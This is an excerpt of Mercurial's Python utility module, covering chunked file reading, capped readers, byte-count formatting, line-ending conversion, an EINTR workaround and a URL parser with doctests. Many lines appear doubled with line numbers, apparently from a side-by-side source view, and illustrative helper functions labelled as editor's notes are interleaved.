2630 chunkl = len(chunk)
2631 offset = self._chunkoffset
2631 offset = self._chunkoffset
2632
2632
2633 # Use full chunk.
2633 # Use full chunk.
2634 if offset == 0 and left >= chunkl:
2634 if offset == 0 and left >= chunkl:
2635 left -= chunkl
2635 left -= chunkl
2636 queue.popleft()
2636 queue.popleft()
2637 buf.append(chunk)
2637 buf.append(chunk)
2638 # self._chunkoffset remains at 0.
2638 # self._chunkoffset remains at 0.
2639 continue
2639 continue
2640
2640
2641 chunkremaining = chunkl - offset
2641 chunkremaining = chunkl - offset
2642
2642
2643 # Use all of unconsumed part of chunk.
2643 # Use all of unconsumed part of chunk.
2644 if left >= chunkremaining:
2644 if left >= chunkremaining:
2645 left -= chunkremaining
2645 left -= chunkremaining
2646 queue.popleft()
2646 queue.popleft()
2647 # offset == 0 is enabled by block above, so this won't merely
2647 # offset == 0 is enabled by block above, so this won't merely
2648 # copy via ``chunk[0:]``.
2648 # copy via ``chunk[0:]``.
2649 buf.append(chunk[offset:])
2649 buf.append(chunk[offset:])
2650 self._chunkoffset = 0
2650 self._chunkoffset = 0
2651
2651
2652 # Partial chunk needed.
2652 # Partial chunk needed.
2653 else:
2653 else:
2654 buf.append(chunk[offset : offset + left])
2654 buf.append(chunk[offset : offset + left])
2655 self._chunkoffset += left
2655 self._chunkoffset += left
2656 left -= chunkremaining
2656 left -= chunkremaining
2657
2657
2658 return b''.join(buf)
2658 return b''.join(buf)
2659
2659
2660
2660
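# Editor's note: an illustrative re-chunking helper built on chunkbuffer, not
# part of the original module. The record size and helper name are made up.
def _iterrecords(chunks, recordsize=64):
    """Yield fixed-size records from an iterator of arbitrarily sized chunks."""
    buf = chunkbuffer(chunks)
    while True:
        record = buf.read(recordsize)
        if not record:
            break
        yield record

# Example: list(_iterrecords(iter([b'a' * 100, b'b' * 50]), 64)) yields three
# records of 64, 64 and 22 bytes.
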
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        if limit is None:
            nbytes = size
        else:
            nbytes = min(limit, size)
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s


class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up to
    N bytes from that source file object. Attempts to read past the allowed
    limit are treated as EOF.

    It is assumed that I/O is not performed on the original file object
    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """

    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        if not self._left:
            return b''

        if n < 0:
            n = self._left

        data = self._fh.read(min(n, self._left))
        self._left -= len(data)
        assert self._left >= 0

        return data

    def readinto(self, b):
        res = self.read(len(b))
        if res is None:
            return None

        b[0 : len(res)] = res
        return len(res)


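# Editor's note: illustrative only, not part of the original module; shows the
# EOF-at-the-cap behaviour using an in-memory stream.
def _cappedreaderdemo():
    import io

    src = io.BytesIO(b'0123456789')
    capped = cappedreader(src, 4)
    first = capped.read()   # b'0123' - everything the cap allows
    second = capped.read()  # b'' - past the limit reads as EOF
    return first, second
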
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def go(count):
        for multiplier, divisor, format in unittable:
            if abs(count) >= divisor * multiplier:
                return format % (count / float(divisor))
        return unittable[-1][2] % count

    return go


def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
        ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
        ...
    ParseError: fromline must be strictly positive
    """
    if toline - fromline < 0:
        raise error.ParseError(_(b"line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_(b"fromline must be strictly positive"))
    return fromline - 1, toline


bytecount = unitcountfn(
    (100, 1 << 30, _(b'%.0f GB')),
    (10, 1 << 30, _(b'%.1f GB')),
    (1, 1 << 30, _(b'%.2f GB')),
    (100, 1 << 20, _(b'%.0f MB')),
    (10, 1 << 20, _(b'%.1f MB')),
    (1, 1 << 20, _(b'%.2f MB')),
    (100, 1 << 10, _(b'%.0f KB')),
    (10, 1 << 10, _(b'%.1f KB')),
    (1, 1 << 10, _(b'%.2f KB')),
    (1, 1, _(b'%.0f bytes')),
)


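# Editor's note: an illustrative counter built with unitcountfn(), mirroring
# how bytecount above is constructed but with plain, untranslated format
# strings. The name and the unit table are made up.
_revcount = unitcountfn(
    (10, 1000000, b'%.1f M revisions'),
    (1, 1000000, b'%.2f M revisions'),
    (1, 1, b'%d revisions'),
)
# _revcount(25000000) -> b'25.0 M revisions'; _revcount(42) -> b'42 revisions'
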
class transformingwriter(object):
    """Writable file wrapper to transform data by function"""

    def __init__(self, fp, encode):
        self._fp = fp
        self._encode = encode

    def close(self):
        self._fp.close()

    def flush(self):
        self._fp.flush()

    def write(self, data):
        return self._fp.write(self._encode(data))


# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')


def tolf(s):
    return _eolre.sub(b'\n', s)


def tocrlf(s):
    return _eolre.sub(b'\r\n', s)


def _crlfwriter(fp):
    return transformingwriter(fp, tocrlf)


if pycompat.oslinesep == b'\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
    nativeeolwriter = _crlfwriter
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
    nativeeolwriter = pycompat.identity

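# Editor's note: an illustrative writer that always emits CRLF line endings by
# combining transformingwriter with tocrlf; not part of the original module,
# and the helper name is made up.
def _crlfdump(fp, lines):
    out = transformingwriter(fp, tocrlf)
    for line in lines:
        out.write(line + b'\n')
    out.flush()
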
2814 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2814 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2815 3,
2815 3,
2816 0,
2816 0,
2817 ):
2817 ):
2818 # There is an issue in CPython that some IO methods do not handle EINTR
2818 # There is an issue in CPython that some IO methods do not handle EINTR
2819 # correctly. The following table shows what CPython version (and functions)
2819 # correctly. The following table shows what CPython version (and functions)
2820 # are affected (buggy: has the EINTR bug, okay: otherwise):
2820 # are affected (buggy: has the EINTR bug, okay: otherwise):
2821 #
2821 #
2822 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2822 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2823 # --------------------------------------------------
2823 # --------------------------------------------------
2824 # fp.__iter__ | buggy | buggy | okay
2824 # fp.__iter__ | buggy | buggy | okay
2825 # fp.read* | buggy | okay [1] | okay
2825 # fp.read* | buggy | okay [1] | okay
2826 #
2826 #
2827 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2827 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2828 #
2828 #
2829 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2829 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2830 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2830 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2831 #
2831 #
2832 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2832 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2833 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2833 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2834 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2834 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2835 # fp.__iter__ but not other fp.read* methods.
2835 # fp.__iter__ but not other fp.read* methods.
2836 #
2836 #
2837 # On modern systems like Linux, the "read" syscall cannot be interrupted
2837 # On modern systems like Linux, the "read" syscall cannot be interrupted
2838 # when reading "fast" files like on-disk files. So the EINTR issue only
2838 # when reading "fast" files like on-disk files. So the EINTR issue only
2839 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2839 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2840 # files approximately as "fast" files and use the fast (unsafe) code path,
2840 # files approximately as "fast" files and use the fast (unsafe) code path,
2841 # to minimize the performance impact.
2841 # to minimize the performance impact.
2842 if sys.version_info >= (2, 7, 4):
2842 if sys.version_info >= (2, 7, 4):
2843 # fp.readline deals with EINTR correctly, use it as a workaround.
2843 # fp.readline deals with EINTR correctly, use it as a workaround.
2844 def _safeiterfile(fp):
2844 def _safeiterfile(fp):
2845 return iter(fp.readline, b'')
2845 return iter(fp.readline, b'')
2846
2846
2847 else:
2847 else:
2848 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2848 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2849 # note: this may block longer than necessary because of bufsize.
2849 # note: this may block longer than necessary because of bufsize.
2850 def _safeiterfile(fp, bufsize=4096):
2850 def _safeiterfile(fp, bufsize=4096):
2851 fd = fp.fileno()
2851 fd = fp.fileno()
2852 line = b''
2852 line = b''
2853 while True:
2853 while True:
2854 try:
2854 try:
2855 buf = os.read(fd, bufsize)
2855 buf = os.read(fd, bufsize)
2856 except OSError as ex:
2856 except OSError as ex:
2857 # os.read only raises EINTR before any data is read
2857 # os.read only raises EINTR before any data is read
2858 if ex.errno == errno.EINTR:
2858 if ex.errno == errno.EINTR:
2859 continue
2859 continue
2860 else:
2860 else:
2861 raise
2861 raise
2862 line += buf
2862 line += buf
2863 if b'\n' in buf:
2863 if b'\n' in buf:
2864 splitted = line.splitlines(True)
2864 splitted = line.splitlines(True)
2865 line = b''
2865 line = b''
2866 for l in splitted:
2866 for l in splitted:
2867 if l[-1] == b'\n':
2867 if l[-1] == b'\n':
2868 yield l
2868 yield l
2869 else:
2869 else:
2870 line = l
2870 line = l
2871 if not buf:
2871 if not buf:
2872 break
2872 break
2873 if line:
2873 if line:
2874 yield line
2874 yield line
2875
2875
2876 def iterfile(fp):
2876 def iterfile(fp):
2877 fastpath = True
2877 fastpath = True
2878 if type(fp) is file:
2878 if type(fp) is file:
2879 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2879 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2880 if fastpath:
2880 if fastpath:
2881 return fp
2881 return fp
2882 else:
2882 else:
2883 return _safeiterfile(fp)
2883 return _safeiterfile(fp)
2884
2884
2885
2885
2886 else:
2886 else:
2887 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2887 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2888 def iterfile(fp):
2888 def iterfile(fp):
2889 return fp
2889 return fp
2890
2890
2891
2891
def iterlines(iterator):
    for chunk in iterator:
        for line in chunk.splitlines():
            yield line


def expandpath(path):
    return os.path.expanduser(os.path.expandvars(path))


def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda s: s)
    patterns = b'|'.join(mapping.keys())
    if escape_prefix:
        patterns += b'|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)


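# Editor's note: an illustrative expansion with interpolate(); the mapping and
# template below are made up. With the default escape_prefix=False the prefix
# character itself cannot be escaped in the input string.
def _expandtemplate():
    mapping = {b'user': b'alice', b'rev': b'42'}
    return interpolate(b'%', mapping, b'checked in by %user as r%rev')
    # -> b'checked in by alice as r42'
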
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        pass

    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        raise error.Abort(
            _(b"no port number associated with service '%s'") % port
        )


2948 class url(object):
2948 class url(object):
2949 r"""Reliable URL parser.
2949 r"""Reliable URL parser.
2950
2950
2951 This parses URLs and provides attributes for the following
2951 This parses URLs and provides attributes for the following
2952 components:
2952 components:
2953
2953
2954 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2954 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2955
2955
2956 Missing components are set to None. The only exception is
2956 Missing components are set to None. The only exception is
2957 fragment, which is set to '' if present but empty.
2957 fragment, which is set to '' if present but empty.
2958
2958
2959 If parsefragment is False, fragment is included in query. If
2959 If parsefragment is False, fragment is included in query. If
2960 parsequery is False, query is included in path. If both are
2960 parsequery is False, query is included in path. If both are
2961 False, both fragment and query are included in path.
2961 False, both fragment and query are included in path.
2962
2962
2963 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2963 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2964
2964
2965 Note that for backward compatibility reasons, bundle URLs do not
2965 Note that for backward compatibility reasons, bundle URLs do not
2966 take host names. That means 'bundle://../' has a path of '../'.
2966 take host names. That means 'bundle://../' has a path of '../'.
2967
2967
2968 Examples:
2968 Examples:
2969
2969
2970 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2970 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2971 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2971 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2972 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2972 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2973 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2973 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2974 >>> url(b'file:///home/joe/repo')
2974 >>> url(b'file:///home/joe/repo')
2975 <url scheme: 'file', path: '/home/joe/repo'>
2975 <url scheme: 'file', path: '/home/joe/repo'>
2976 >>> url(b'file:///c:/temp/foo/')
2976 >>> url(b'file:///c:/temp/foo/')
2977 <url scheme: 'file', path: 'c:/temp/foo/'>
2977 <url scheme: 'file', path: 'c:/temp/foo/'>
2978 >>> url(b'bundle:foo')
2978 >>> url(b'bundle:foo')
2979 <url scheme: 'bundle', path: 'foo'>
2979 <url scheme: 'bundle', path: 'foo'>
2980 >>> url(b'bundle://../foo')
2980 >>> url(b'bundle://../foo')
2981 <url scheme: 'bundle', path: '../foo'>
2981 <url scheme: 'bundle', path: '../foo'>
2982 >>> url(br'c:\foo\bar')
2982 >>> url(br'c:\foo\bar')
2983 <url path: 'c:\\foo\\bar'>
2983 <url path: 'c:\\foo\\bar'>
2984 >>> url(br'\\blah\blah\blah')
2984 >>> url(br'\\blah\blah\blah')
2985 <url path: '\\\\blah\\blah\\blah'>
2985 <url path: '\\\\blah\\blah\\blah'>
2986 >>> url(br'\\blah\blah\blah#baz')
2986 >>> url(br'\\blah\blah\blah#baz')
2987 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2987 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2988 >>> url(br'file:///C:\users\me')
2988 >>> url(br'file:///C:\users\me')
2989 <url scheme: 'file', path: 'C:\\users\\me'>
2989 <url scheme: 'file', path: 'C:\\users\\me'>
2990
2990
2991 Authentication credentials:
2991 Authentication credentials:
2992
2992
2993 >>> url(b'ssh://joe:xyz@x/repo')
2993 >>> url(b'ssh://joe:xyz@x/repo')
2994 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2994 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2995 >>> url(b'ssh://joe@x/repo')
2995 >>> url(b'ssh://joe@x/repo')
2996 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2996 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2997
2997
2998 Query strings and fragments:
2998 Query strings and fragments:
2999
2999
3000 >>> url(b'http://host/a?b#c')
3000 >>> url(b'http://host/a?b#c')
3001 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3001 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3002 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3002 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3003 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3003 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3004
3004
3005 Empty path:
3005 Empty path:
3006
3006
3007 >>> url(b'')
3007 >>> url(b'')
3008 <url path: ''>
3008 <url path: ''>
3009 >>> url(b'#a')
3009 >>> url(b'#a')
3010 <url path: '', fragment: 'a'>
3010 <url path: '', fragment: 'a'>
3011 >>> url(b'http://host/')
3011 >>> url(b'http://host/')
3012 <url scheme: 'http', host: 'host', path: ''>
3012 <url scheme: 'http', host: 'host', path: ''>
3013 >>> url(b'http://host/#a')
3013 >>> url(b'http://host/#a')
3014 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3014 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3015
3015
3016 Only scheme:
3016 Only scheme:
3017
3017
3018 >>> url(b'http:')
3018 >>> url(b'http:')
3019 <url scheme: 'http'>
3019 <url scheme: 'http'>
3020 """
3020 """
3021
3021
3022 _safechars = b"!~*'()+"
3022 _safechars = b"!~*'()+"
3023 _safepchars = b"/!~*'()+:\\"
3023 _safepchars = b"/!~*'()+:\\"
3024 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3024 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3025
3025
3026 def __init__(self, path, parsequery=True, parsefragment=True):
3026 def __init__(self, path, parsequery=True, parsefragment=True):
3027 # We slowly chomp away at path until we have only the path left
3027 # We slowly chomp away at path until we have only the path left
3028 self.scheme = self.user = self.passwd = self.host = None
3028 self.scheme = self.user = self.passwd = self.host = None
3029 self.port = self.path = self.query = self.fragment = None
3029 self.port = self.path = self.query = self.fragment = None
3030 self._localpath = True
3030 self._localpath = True
3031 self._hostport = b''
3031 self._hostport = b''
3032 self._origpath = path
3032 self._origpath = path
3033
3033
3034 if parsefragment and b'#' in path:
3034 if parsefragment and b'#' in path:
3035 path, self.fragment = path.split(b'#', 1)
3035 path, self.fragment = path.split(b'#', 1)
3036
3036
3037 # special case for Windows drive letters and UNC paths
3037 # special case for Windows drive letters and UNC paths
3038 if hasdriveletter(path) or path.startswith(b'\\\\'):
3038 if hasdriveletter(path) or path.startswith(b'\\\\'):
3039 self.path = path
3039 self.path = path
3040 return
3040 return
3041
3041
3042 # For compatibility reasons, we can't handle bundle paths as
3042 # For compatibility reasons, we can't handle bundle paths as
3043 # normal URLs
3043 # normal URLs
3044 if path.startswith(b'bundle:'):
3044 if path.startswith(b'bundle:'):
3045 self.scheme = b'bundle'
3045 self.scheme = b'bundle'
3046 path = path[7:]
3046 path = path[7:]
3047 if path.startswith(b'//'):
3047 if path.startswith(b'//'):
3048 path = path[2:]
3048 path = path[2:]
3049 self.path = path
3049 self.path = path
3050 return
3050 return
3051
3051
3052 if self._matchscheme(path):
3052 if self._matchscheme(path):
3053 parts = path.split(b':', 1)
3053 parts = path.split(b':', 1)
3054 if parts[0]:
3054 if parts[0]:
3055 self.scheme, path = parts
3055 self.scheme, path = parts
3056 self._localpath = False
3056 self._localpath = False
3057
3057
3058 if not path:
3058 if not path:
3059 path = None
3059 path = None
3060 if self._localpath:
3060 if self._localpath:
3061 self.path = b''
3061 self.path = b''
3062 return
3062 return
3063 else:
3063 else:
3064 if self._localpath:
3064 if self._localpath:
3065 self.path = path
3065 self.path = path
3066 return
3066 return
3067
3067
3068 if parsequery and b'?' in path:
3068 if parsequery and b'?' in path:
3069 path, self.query = path.split(b'?', 1)
3069 path, self.query = path.split(b'?', 1)
3070 if not path:
3070 if not path:
3071 path = None
3071 path = None
3072 if not self.query:
3072 if not self.query:
3073 self.query = None
3073 self.query = None
3074
3074
3075 # // is required to specify a host/authority
3075 # // is required to specify a host/authority
3076 if path and path.startswith(b'//'):
3076 if path and path.startswith(b'//'):
3077 parts = path[2:].split(b'/', 1)
3077 parts = path[2:].split(b'/', 1)
3078 if len(parts) > 1:
3078 if len(parts) > 1:
3079 self.host, path = parts
3079 self.host, path = parts
3080 else:
3080 else:
3081 self.host = parts[0]
3081 self.host = parts[0]
3082 path = None
3082 path = None
3083 if not self.host:
3083 if not self.host:
3084 self.host = None
3084 self.host = None
3085 # path of file:///d is /d
3085 # path of file:///d is /d
3086 # path of file:///d:/ is d:/, not /d:/
3086 # path of file:///d:/ is d:/, not /d:/
3087 if path and not hasdriveletter(path):
3087 if path and not hasdriveletter(path):
3088 path = b'/' + path
3088 path = b'/' + path
3089
3089
3090 if self.host and b'@' in self.host:
3090 if self.host and b'@' in self.host:
3091 self.user, self.host = self.host.rsplit(b'@', 1)
3091 self.user, self.host = self.host.rsplit(b'@', 1)
3092 if b':' in self.user:
3092 if b':' in self.user:
3093 self.user, self.passwd = self.user.split(b':', 1)
3093 self.user, self.passwd = self.user.split(b':', 1)
3094 if not self.host:
3094 if not self.host:
3095 self.host = None
3095 self.host = None
3096
3096
3097 # Don't split on colons in IPv6 addresses without ports
3097 # Don't split on colons in IPv6 addresses without ports
3098 if (
3098 if (
3099 self.host
3099 self.host
3100 and b':' in self.host
3100 and b':' in self.host
3101 and not (
3101 and not (
3102 self.host.startswith(b'[') and self.host.endswith(b']')
3102 self.host.startswith(b'[') and self.host.endswith(b']')
3103 )
3103 )
3104 ):
3104 ):
3105 self._hostport = self.host
3105 self._hostport = self.host
3106 self.host, self.port = self.host.rsplit(b':', 1)
3106 self.host, self.port = self.host.rsplit(b':', 1)
3107 if not self.host:
3107 if not self.host:
3108 self.host = None
3108 self.host = None
3109
3109
3110 if (
3110 if (
3111 self.host
3111 self.host
3112 and self.scheme == b'file'
3112 and self.scheme == b'file'
3113 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3113 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3114 ):
3114 ):
3115 raise error.Abort(
3115 raise error.Abort(
3116 _(b'file:// URLs can only refer to localhost')
3116 _(b'file:// URLs can only refer to localhost')
3117 )
3117 )
3118
3118
3119 self.path = path
3119 self.path = path
3120
3120
3121 # leave the query string escaped
3121 # leave the query string escaped
3122 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3122 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3123 v = getattr(self, a)
3123 v = getattr(self, a)
3124 if v is not None:
3124 if v is not None:
3125 setattr(self, a, urlreq.unquote(v))
3125 setattr(self, a, urlreq.unquote(v))
3126
3126
3127 @encoding.strmethod
3127 @encoding.strmethod
3128 def __repr__(self):
3128 def __repr__(self):
3129 attrs = []
3129 attrs = []
3130 for a in (
3130 for a in (
3131 b'scheme',
3131 b'scheme',
3132 b'user',
3132 b'user',
3133 b'passwd',
3133 b'passwd',
3134 b'host',
3134 b'host',
3135 b'port',
3135 b'port',
3136 b'path',
3136 b'path',
3137 b'query',
3137 b'query',
3138 b'fragment',
3138 b'fragment',
3139 ):
3139 ):
3140 v = getattr(self, a)
3140 v = getattr(self, a)
3141 if v is not None:
3141 if v is not None:
3142 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3142 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3143 return b'<url %s>' % b', '.join(attrs)
3143 return b'<url %s>' % b', '.join(attrs)
3144
3144
3145 def __bytes__(self):
3145 def __bytes__(self):
3146 r"""Join the URL's components back into a URL string.
3146 r"""Join the URL's components back into a URL string.
3147
3147
3148 Examples:
3148 Examples:
3149
3149
3150 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3150 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3151 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3151 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3152 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3152 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3153 'http://user:pw@host:80/?foo=bar&baz=42'
3153 'http://user:pw@host:80/?foo=bar&baz=42'
3154 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3154 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3155 'http://user:pw@host:80/?foo=bar%3dbaz'
3155 'http://user:pw@host:80/?foo=bar%3dbaz'
3156 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3156 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3157 'ssh://user:pw@[::1]:2200//home/joe#'
3157 'ssh://user:pw@[::1]:2200//home/joe#'
3158 >>> bytes(url(b'http://localhost:80//'))
3158 >>> bytes(url(b'http://localhost:80//'))
3159 'http://localhost:80//'
3159 'http://localhost:80//'
3160 >>> bytes(url(b'http://localhost:80/'))
3160 >>> bytes(url(b'http://localhost:80/'))
3161 'http://localhost:80/'
3161 'http://localhost:80/'
3162 >>> bytes(url(b'http://localhost:80'))
3162 >>> bytes(url(b'http://localhost:80'))
3163 'http://localhost:80/'
3163 'http://localhost:80/'
3164 >>> bytes(url(b'bundle:foo'))
3164 >>> bytes(url(b'bundle:foo'))
3165 'bundle:foo'
3165 'bundle:foo'
3166 >>> bytes(url(b'bundle://../foo'))
3166 >>> bytes(url(b'bundle://../foo'))
3167 'bundle:../foo'
3167 'bundle:../foo'
3168 >>> bytes(url(b'path'))
3168 >>> bytes(url(b'path'))
3169 'path'
3169 'path'
3170 >>> bytes(url(b'file:///tmp/foo/bar'))
3170 >>> bytes(url(b'file:///tmp/foo/bar'))
3171 'file:///tmp/foo/bar'
3171 'file:///tmp/foo/bar'
3172 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3172 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3173 'file:///c:/tmp/foo/bar'
3173 'file:///c:/tmp/foo/bar'
3174 >>> print(url(br'bundle:foo\bar'))
3174 >>> print(url(br'bundle:foo\bar'))
3175 bundle:foo\bar
3175 bundle:foo\bar
3176 >>> print(url(br'file:///D:\data\hg'))
3176 >>> print(url(br'file:///D:\data\hg'))
3177 file:///D:\data\hg
3177 file:///D:\data\hg
3178 """
3178 """
3179 if self._localpath:
3179 if self._localpath:
3180 s = self.path
3180 s = self.path
3181 if self.scheme == b'bundle':
3181 if self.scheme == b'bundle':
3182 s = b'bundle:' + s
3182 s = b'bundle:' + s
3183 if self.fragment:
3183 if self.fragment:
3184 s += b'#' + self.fragment
3184 s += b'#' + self.fragment
3185 return s
3185 return s
3186
3186
3187 s = self.scheme + b':'
3187 s = self.scheme + b':'
3188 if self.user or self.passwd or self.host:
3188 if self.user or self.passwd or self.host:
3189 s += b'//'
3189 s += b'//'
3190 elif self.scheme and (
3190 elif self.scheme and (
3191 not self.path
3191 not self.path
3192 or self.path.startswith(b'/')
3192 or self.path.startswith(b'/')
3193 or hasdriveletter(self.path)
3193 or hasdriveletter(self.path)
3194 ):
3194 ):
3195 s += b'//'
3195 s += b'//'
3196 if hasdriveletter(self.path):
3196 if hasdriveletter(self.path):
3197 s += b'/'
3197 s += b'/'
3198 if self.user:
3198 if self.user:
3199 s += urlreq.quote(self.user, safe=self._safechars)
3199 s += urlreq.quote(self.user, safe=self._safechars)
3200 if self.passwd:
3200 if self.passwd:
3201 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3201 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3202 if self.user or self.passwd:
3202 if self.user or self.passwd:
3203 s += b'@'
3203 s += b'@'
3204 if self.host:
3204 if self.host:
3205 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3205 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3206 s += urlreq.quote(self.host)
3206 s += urlreq.quote(self.host)
3207 else:
3207 else:
3208 s += self.host
3208 s += self.host
3209 if self.port:
3209 if self.port:
3210 s += b':' + urlreq.quote(self.port)
3210 s += b':' + urlreq.quote(self.port)
3211 if self.host:
3211 if self.host:
3212 s += b'/'
3212 s += b'/'
3213 if self.path:
3213 if self.path:
3214 # TODO: similar to the query string, we should not unescape the
3214 # TODO: similar to the query string, we should not unescape the
3215 # path when we store it; the path might contain '%2f' = '/',
3215 # path when we store it; the path might contain '%2f' = '/',
3216 # which we should *not* escape.
3216 # which we should *not* escape.
3217 s += urlreq.quote(self.path, safe=self._safepchars)
3217 s += urlreq.quote(self.path, safe=self._safepchars)
3218 if self.query:
3218 if self.query:
3219 # we store the query in escaped form.
3219 # we store the query in escaped form.
3220 s += b'?' + self.query
3220 s += b'?' + self.query
3221 if self.fragment is not None:
3221 if self.fragment is not None:
3222 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3222 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3223 return s
3223 return s
3224
3224
3225 __str__ = encoding.strmethod(__bytes__)
3225 __str__ = encoding.strmethod(__bytes__)
3226
3226
3227 def authinfo(self):
3227 def authinfo(self):
3228 user, passwd = self.user, self.passwd
3228 user, passwd = self.user, self.passwd
3229 try:
3229 try:
3230 self.user, self.passwd = None, None
3230 self.user, self.passwd = None, None
